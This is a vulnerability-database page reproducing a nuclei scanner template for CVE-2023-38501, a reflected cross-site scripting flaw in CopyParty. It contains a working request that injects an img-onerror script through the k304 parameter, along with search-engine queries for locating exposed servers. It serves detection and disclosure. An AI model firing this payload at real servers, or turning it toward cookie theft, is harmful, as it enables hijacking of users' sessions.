Lucene search
K

CopyParty v1.8.6 - Cross Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

CopyParty v1.8.6 - Reflected Cross Site Scripting (XSS) attac

Related
Refs
Code
id: CVE-2023-38501

info:
  name: CopyParty v1.8.6 - Cross Site Scripting
  author: ctflearner,r3Y3r53
  severity: medium
  description: |
    Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the k304 parameter to steal user session cookies when users click malicious links to CopyParty.
  remediation: Fixed in v1.8.6
  reference:
    - https://www.exploit-db.com/exploits/51635
    - https://github.com/9001/copyparty/releases/tag/v1.8.6
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38501
    - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
    - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-38501
    cwe-id: CWE-79
    epss-score: 0.06195
    epss-percentile: 0.92634
    cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: copyparty_project
    product: copyparty
    shodan-query:
      - title:"copyparty"
      - http.title:"copyparty"
    fofa-query: title="copyparty"
    google-query: intitle:"copyparty"
  tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
        condition: and
# digest: 4b0a00483046022100ec0bde1217dbe40a54066b490b7f033c910358f7b0f538d3cda20fccc28fa982022100b52be42d6b5b218087088f30665fb77b7d43af9e45b674a53b86519510bcc4e3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1 - 6.3
EPSS0.06195
SSVC
34